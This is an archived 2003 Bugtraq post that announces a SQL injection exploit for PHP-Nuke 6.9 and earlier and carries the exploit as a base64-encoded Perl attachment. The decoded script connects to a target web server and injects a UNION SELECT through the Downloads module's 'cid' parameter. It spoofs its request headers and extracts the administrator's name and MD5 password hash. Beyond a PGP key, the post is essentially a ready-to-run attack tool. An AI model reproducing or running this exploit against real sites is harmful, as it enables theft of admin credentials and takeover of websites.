[32930] in bugtraq
PHP-NUKE version <= 6.9 'cid' sql injection exploit
daemon@ATHENA.MIT.EDU (r00t@rsteam.ru)
Sat Dec 20 18:46:28 2003
Date: Sun, 21 Dec 2003 01:36:08 +0300
From: r00t@rsteam.ru
Reply-To: r00t@rsteam.ru
Message-ID: <1338081765.20031221013608@rsteam.ru>
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----------6DA4AD110E3824"
------------6DA4AD110E3824
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
PHP-NUKE version <= 6.9 'cid' sql injection exploit
----------------------
RusH security team
http://rst.void.ru
http://www.rsteam.ru
----------------------
mailto:r00t@rsteam.ru
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP 8.0.2
mQGiBD8+oMARBADX7sY86saLDTZXFOqXxDfvCfFrE2PIwp+1zrY5x/W3Tp7IxatZ
3+K2++XyBY+fIUGXXssoEIBFZqACBN7GCEZ+bdLn4P+nQujst7jxMDeM9vmoVZ9r
ZuDrNSxN1iUnbbpzrHdEKKPbM1dejpkVfpP7QVDvJLw1BdpDv8hrrYOZ7QCg/2dt
j+8desyl8SbNpgwtF2Spw3MD/RqX26aGb17a23qm7emDlAYZP0hvTKDuo7cdevVc
vfocvBKAFK1zQM4sbw4CtLLG75jrNPJOb9Blxx3TDbOJ4Y9IYwScG3yE5yWzE9K6
Ayd47hCJZXVHWmvcawB+mIBR6qEnGEAwwm8hAZzwfZP6KuOP+m77JE9pD6jdHh8R
lP9fBAC8XfHdT4Qk19IHoctMOOSYlq/qDJDiHRy33sGbfKFK9oGzdbWBTtaijGa/
Ni6nSOha75e8p0ObuUcwmM2AJ25dnvdNsveqRENDPN2ksGB0WVCfaM08Gx3hqKVE
zEaChYgKLeQntMFGdz1ijAkUATvYkScPrLdqSwNpB7wj3O7KtLQcMWR0LncwbGYg
PGlkdHdvbGZAcGlzZW0ubmV0PokAVwQQEQIAFwUCPz6gwAcLCQgHAwIKAhkBBRsD
AAAAAAoJEOc7beKo+uDKKWoAoPoCU3/H90Vmi1fxrUyqXV2+xjREAKCu/p+8hnlm
KR3VZZS6E5otSZTORLkCDQQ/PqDAEAgA9kJXtwh/CBdyorrWqULzBej5UxE5T7bx
brlLOCDaAadWoxTpj0BV89AHxstDqZSt90xkhkn4DIO9ZekX1KHTUPj1WV/cdlJP
PT2N286Z4VeSWc39uK50T8X8dryDxUcwYc58yWb/Ffm7/ZFexwGq01uejaClcjrU
GvC/RgBYK+X0iP1YTknbzSC0neSRBzZrM2w4DUUdD3yIsxx8Wy2O9vPJI8BD8KVb
GI2Ou1WMuF040zT9fBdXQ6MdGGzeMyEstSr/POGxKUAYEY18hKcKctaGxAMZyAcp
esqVDNmWn6vQClCbAkbTCD1mpF1Bn5x8vYlLIhkmuquiXsNV6TILOwACAggAjS5g
+HibMlO5wn8ywIpObRLqOqbbaEvzHY8Ja5OcirXTmkPUfnlRFHguJ2MsG2PuZJK3
o8pe+w2ML5O3ZZAGkAqYay42jKuDcxsisTXKqIoFCsXE9QcSn7H381w68pGPz4cz
ZhEMzA3gRsnrdPfbmIqHoWfLgwzg14WYQiP5AvyDck2t8FImLHWBJQtrs1a2eV4N
OlvSNchOqTYNxsQOCgVEg6vHM8krgM9vb21uXUPqhSo/xxEo5nNgdFpUbgNYbU3z
rGAyUPK1ikt2E1KfCWDtKUBCMBYHi+341aq++2tZHZ3MRmml010+/zkLXdF2R8di
Q2oOf9VAZc+2CTg4ookATAQYEQIADAUCPz6gwAUbDAAAAAAKCRDnO23iqPrgyrh+
AKCPKzCodjzGep2lbt3VSkjS62e7OACgnln/OMbUHa3X99fsJNvrR+e9Uss=
=2wgM
-----END PGP PUBLIC KEY BLOCK-----
------------6DA4AD110E3824
Content-Type: application/octet-stream; name="r57nuke-cid.pl"
Content-transfer-encoding: base64
Content-Disposition: attachment; filename="r57nuke-cid.pl"
IyEvdXNyL2Jpbi9wZXJsIC13DQp1c2UgSU86OlNvY2tldDsNCg0KIyMjIyMjIyMjIyMjIyMj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyMgVEhJUyBDT0RFIFBVQkxJQyBOT1cgID0p
KSkgICAgICAgICAjIw0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
Iw0KIyMgX19fX19fX19fXyAgICAgICAgICAgICAgIF9fXyBfX18gICAjIw0KIyMgXF9fX19f
XyAgIFxfXyBfXyAgX19fX19fLyAgIHwgICBcICAjIw0KIyMgIHwgICAgICAgXy8gIHwgIFwv
ICBfX18vICAgIF8gICAgXCAjIw0KIyMgIHwgICAgfCAgIFwgIHwgIC9cX19fIFxcICAgICAg
ICAgLyAjIw0KIyMgIHxfX19ffF8gIC9fX19fLy9fX19fICA+XF9fX3xfICAvICAjIw0KIyMg
ICAgICAgICBcLyAgICAgICAgICAgXC8gICAgICAgXC8gICAjIw0KIyMjIyMjIyMjIyMjIyMj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyMgYmFzZWQgb24gJ2NpZCcgc3FsIGluamVj
dGlvbiB2dWxuDQojIyBpbiBEb3dubG9hZCBtb2R1bGUsIG1vcmUgaW5mbyBhYm91dA0KIyMg
dGhpcyB2dWxuIHUgY2FuIHNlZSBoZXJlOg0KIyMgaHR0cDovL3JzdC52b2lkLnJ1L3RleHRz
L2Fkdmlzb3J5MTAuaHRtDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
IyMjDQojIyB3b3JrIG9ubHkgb24gbXlzcWwgdmVyc2lvbiA+IDQuMA0KIyMjIyMjIyMjIyMj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyMgdGVzdGVkIG9uIFBIUC1OdWtlIHZl
cnNpb25zOiA2LjksIDYuMCwgNi41DQojIyBDOlw+cjU3cGhwbnVrZS5wbCAxMjcuMC4wLjEg
L3BocG51a2UvIGFkbWluDQojIw0KIyMgc2VydmVyIDogMTI3LjAuMC4xDQojIyBmb2xkZXIg
OiAvcGhwbnVrZS8NCiMjIGFpZCAgICA6IGFkbWluDQojIw0KIyMgW35dIHByZXBhcmUgdG8g
Y29ubmVjdC4uLg0KIyMgWytdIGNvbm5lY3RlZA0KIyMgW35dIHByZXBhcmUgdG8gc2VuZCBk
YXRhLi4uDQojIyBbK10gc3VjY2Vzcw0KIyMgW35dIHdhaXQgZm9yIHJlcGx5Li4uDQojIyBb
K10gdzAwdC4uLg0KIyMgWytdIFVTRVI6IGFkbWluDQojIyBbK10gTUQ1IEhBU0g6IDVmNGRj
YzNiNWFhNzY1ZDYxZDgzMjdkZWI4ODJjZjk5DQojIw0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj
IyMjIyMjIyMjIyMjIyMjIyMjIw0KDQppZiAoQEFSR1YgPCAzKQ0Kew0KcHJpbnQgIiMjIyMj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjXG4iOw0KcHJpbnQgIiByNTdudWtlLWNpZC5wbCAtIFBI
UC1OVUtFICdjaWQnIHNxbCBpbmplY3Rpb24gZXhwbG9pdFxuIjsNCnByaW50ICIgYnkgUnVz
SCBzZWN1cml0eSB0ZWFtIC8vIHd3dy5yc3RlYW0ucnUgLCBodHRwOi8vcnN0LnZvaWQucnVc
biI7DQpwcmludCAiIGNvZGVkIGJ5IDFkdC53MGxmIC8vIHIwMHRcQHJzdGVhbS5ydSAvLyAx
Ny4wOS4yMDAzXG4iOw0KcHJpbnQgIiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXG4iOw0K
cHJpbnQgIiBVc2FnZTpcbiI7DQpwcmludCAiIHI1N251a2UtY2lkLnBsIDxob3N0PiA8L2Zv
bGRlci8+IDxhaWQ+XG4iOw0KcHJpbnQgIlxuIjsNCnByaW50ICIgPGhvc3Q+IC0gaG9zdCBm
b3IgYXR0YWNrXG4iOw0KcHJpbnQgIiA8L2ZvbGRlci8+IC0gUEhQLW51a2UgZm9sZGVyICgg
L3BocG51a2UvICwgL251a2UvIG9yIC8gZm9yIG5vIGZvbGRlciApXG4iOw0KcHJpbnQgIiA8
YWlkPiAtIHVzZXIgYWlkICwgbmljayAoIGFkbWluICwgYmxhYmxhIClcbiI7DQpwcmludCAi
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMiOw0KZXhpdCgpOw0KfQ0KDQokc2VydmVyID0g
JEFSR1ZbMF07DQokZm9sZGVyID0gJEFSR1ZbMV07DQokYWlkID0gJEFSR1ZbMl07DQoNCnBy
aW50ICJcbiI7DQpwcmludCAic2VydmVyIDogJHNlcnZlclxuIjsNCnByaW50ICJmb2xkZXIg
OiAkZm9sZGVyXG4iOw0KcHJpbnQgImFpZCAgICA6ICRhaWRcbiI7DQpwcmludCAiXG4iOw0K
JHN1Y2Nlc3MgPSAwOw0KJHBhdGhfZG93bmxvYWQgPSAibW9kdWxlcy5waHA/bmFtZT1Eb3du
bG9hZHMmZF9vcD12aWV3ZG93bmxvYWQmY2lkPTIlMjBVTklPTiUyMHNlbGVjdCUyMGNvdW50
ZXIsJTIwYWlkLCUyMHB3ZCUyMEZST00lMjBudWtlX2F1dGhvcnMlMjAtLSI7DQokR0VUID0g
JGZvbGRlciAuICRwYXRoX2Rvd25sb2FkOw0KcHJpbnQgIlt+XSBwcmVwYXJlIHRvIGNvbm5l
Y3QuLi5cbiI7DQokc29ja2V0ID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCBQcm90byA9PiAi
dGNwIiwgUGVlckFkZHIgPT4gIiRzZXJ2ZXIiLCBQZWVyUG9ydCA9PiAiODAiKSB8fCBkaWUg
IlstXSBjb25uZWN0IGZhaWxlZFxuIjsNCnByaW50ICJbK10gY29ubmVjdGVkXG4iOw0KcHJp
bnQgIlt+XSBwcmVwYXJlIHRvIHNlbmQgZGF0YS4uLlxuIjsNCnByaW50ICRzb2NrZXQgIkdF
VCAkR0VUIEhUVFAvMS4xXG4iOw0KcHJpbnQgJHNvY2tldCAiSG9zdDogJHNlcnZlclxuIjsN
CnByaW50ICRzb2NrZXQgIkFjY2VwdDogKi8qXG4iOw0KcHJpbnQgJHNvY2tldCAiSHR0cC1S
ZWZlcmVyOiBodHRwOi8vbWljcm9zb2Z0LmNvbVxuIjsNCnByaW50ICRzb2NrZXQgIlVzZXIt
QWdlbnQ6IEludGVybmV0IEV4cGxvcmVyIDYuMFxuIjsNCnByaW50ICRzb2NrZXQgIlByYWdt
YTogbm8tY2FjaGVcbiI7DQpwcmludCAkc29ja2V0ICJDYWNoZS1Db250cm9sOiBuby1jYWNo
ZVxuIjsNCnByaW50ICRzb2NrZXQgIkNvbm5lY3Rpb246IGNsb3NlXG5cbiI7DQpwcmludCAi
WytdIHN1Y2Nlc3NcbiI7DQpwcmludCAiW35dIHdhaXQgZm9yIHJlcGx5Li4uXG4iOw0Kd2hp
bGUgKCRhbnN3ZXIgPSA8JHNvY2tldD4pDQp7DQogI3ByaW50ICIkYW5zd2VyIjsNCiBpZiAo
JGFuc3dlcj1+LygmYW1wO2NpZD0pKFx3KShcIj48Yj4pKCRhaWQpKDxcL2I+PFwvYT48XC9m
b250PikoLnswLDIwfSkoPGZvbnQgY2xhc3M9XCJjb250ZW50XCI+KSguezMyfSkoPFwvZm9u
dD4pLykNCiB7DQogJHN1Y2Nlc3MgPSAxOw0KIHByaW50ICJbK10gdzAwdC4uLlxuIjsNCiBw
cmludCAiWytdIFVTRVI6ICQxIFxuWytdIE1ENSBIQVNIOiAkNlxuIjsNCiB9DQp9DQppZiAo
JHN1Y2Nlc3MgPT0gMCkgeyBwcmludCAiWy1dIGV4cGxvaXQgZmFpbGVkID0oXG4iOyB9DQo=
------------6DA4AD110E3824--
